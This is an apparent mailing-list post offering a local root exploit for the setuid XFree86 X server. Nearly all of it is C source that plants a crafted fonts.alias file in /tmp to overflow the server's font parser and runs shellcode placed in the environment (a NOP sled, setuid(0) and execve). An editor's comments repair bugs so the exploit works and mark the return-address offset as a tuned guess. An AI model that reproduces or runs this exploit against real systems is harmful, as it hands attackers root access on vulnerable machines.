XFree86 vulnerability exploit
Hello
Below you can find an exploit for the latest bug in the XFree86 software. It plants attacker-controlled fonts.dir and fonts.alias files in /tmp and then starts the (setuid-root) X server with "-fp /tmp", so that the server parses those files; the return address it guesses is taken from this process's own stack pointer, which is why it only works on specific builds.
Tested on some versions of Red Hat Linux (mainly 7.0); the hard-coded stack-address guess will not transfer to other builds without adjustment.
regards
Bender
/* For educational purposes only */
/* Brought to you by bender2@xxxxxxxxxxxx 11.10.2004 */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define NOPNUM 8000
#define ADRNUM 1058
/* shellcode from LSD */
char setuidcode[]= /* 8 bytes */
"\x33\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xb0\x17" /* movb $0x17,%al */
"\xcd\x80" /* int $0x80 */
;
char shellcode[]= /* 24 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//id" /* pushl $0x68732f2f */
"\x68""/tmp" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
char jump[]=
"\x8b\xc4" /* movl %esp,%eax */
"\xc3" /* ret */
;
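/*
 * Build the two font-directory files the X server will parse, then exec the
 * server with /tmp as its font path.
 *
 *   /tmp/fonts.dir   : one plausible-looking entry so the directory is accepted.
 *   /tmp/fonts.alias : ADRNUM bytes of the guessed return address followed by
 *                      a newline -- the overlong alias line that triggers the
 *                      server-side overflow.
 *
 * The payload (NOP sled + setuid(0) + execve("/tmp//id")) is passed to the
 * server through its environment; the return address is this process's own
 * stack pointer (obtained by calling jump[]) plus a hard-coded offset.  That
 * guess assumes a setuid-root server with a predictable, executable stack,
 * which is what ties the exploit to particular builds.
 *
 * Changes against the mailing-list copy: the fonts.dir literal that was
 * wrapped across two lines is restored; the fonts.alias write uses the exact
 * byte count instead of strlen() over an unterminated (uninitialised) buffer;
 * open()/write()/execle() failures are reported; the first descriptor is
 * closed instead of leaked; the debug print shows the address actually used.
 * The payload layout (including the original's double subtraction of
 * strlen(setuidcode)) is kept byte-for-byte so the address guess is unchanged.
 *
 * Returns 1 on any failure; on success execle() does not return.
 */
int main(int argc, char **argv)
{
    char buffer[20000], adr[4], *b, *envp[2];
    unsigned long target;
    size_t len, sled;
    int i, fd;

    (void)argc;
    (void)argv;

    /* jump[] hands back our %esp; +16000 is the tuned distance to the payload
     * in the X server's address space (a guess, not something computed). */
    target = (*(unsigned long (*)(void))jump)() + 16000;
    memcpy(adr, &target, sizeof adr);   /* low 4 bytes, without an aliasing cast */
    printf("adr: 0x%lx\n", target);

    envp[0] = &buffer[2000];
    envp[1] = 0;

    /* fonts.dir is "<count>\n<file> <xlfd-name>\n"; the entry separator is a
     * space (the posted listing had this literal broken across two lines). */
    strcpy(buffer, "1\n");
    strcat(buffer, "aaaa.pcf -aaaa-fixed-small-a-semicondensed--1-1-1-1-a-1-iso1111-1\n");
    len = strlen(buffer);
    /* O_TRUNC so a pre-existing, longer file does not leave stale tail data.
     * NOTE(review): predictable names in world-writable /tmp without O_EXCL
     * are fine for a local PoC but are a symlink/swap hazard for anything else. */
    fd = open("/tmp/fonts.dir", O_CREAT | O_WRONLY | O_TRUNC, 0666);
    if (fd < 0) {
        perror("open /tmp/fonts.dir");
        return 1;
    }
    if (write(fd, buffer, len) != (ssize_t)len) {
        perror("write /tmp/fonts.dir");
        close(fd);
        return 1;
    }
    close(fd);

    /* fonts.alias: the address repeated ADRNUM bytes, then a newline.  Write
     * exactly that many bytes; buffer[] is not NUL-terminated past this run. */
    b = buffer;
    for (i = 0; i < ADRNUM; i++)
        *b++ = adr[i % 4];
    *b++ = '\n';
    len = (size_t)(b - buffer);
    fd = open("/tmp/fonts.alias", O_CREAT | O_WRONLY | O_TRUNC, 0666);
    if (fd < 0) {
        perror("open /tmp/fonts.alias");
        return 1;
    }
    if (write(fd, buffer, len) != (ssize_t)len) {
        perror("write /tmp/fonts.alias");
        close(fd);
        return 1;
    }
    close(fd);

    /* Environment payload at buffer[2000]: NOP sled, setuid(0), execve().
     * The sled length subtracts strlen(setuidcode) twice, exactly as the
     * original did; it is kept so the total stays the layout the +16000 offset
     * was tuned against (presumably -- a single subtraction would shift the
     * payload by 8 bytes). */
    b = &buffer[2000];
    sled = NOPNUM - strlen(setuidcode) - strlen(setuidcode) - strlen(shellcode);
    memset(b, 0x90, sled);
    b += sled;
    memcpy(b, setuidcode, strlen(setuidcode));
    b += strlen(setuidcode);
    memcpy(b, shellcode, strlen(shellcode));
    b += strlen(shellcode);
    *b = 0;

    /* Exec the server with the attacker-controlled font path; execle() only
     * returns if the exec itself failed. */
    execle("/usr/bin/X11/X", "X", ":0", "-fp", "/tmp", (char *)0, envp);
    perror("execle /usr/bin/X11/X");
    return 1;
}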
--
bender2@xxxxxxxxxxxxxxxx
SDF Public Access UNIX System - http://sdf.lonestar.org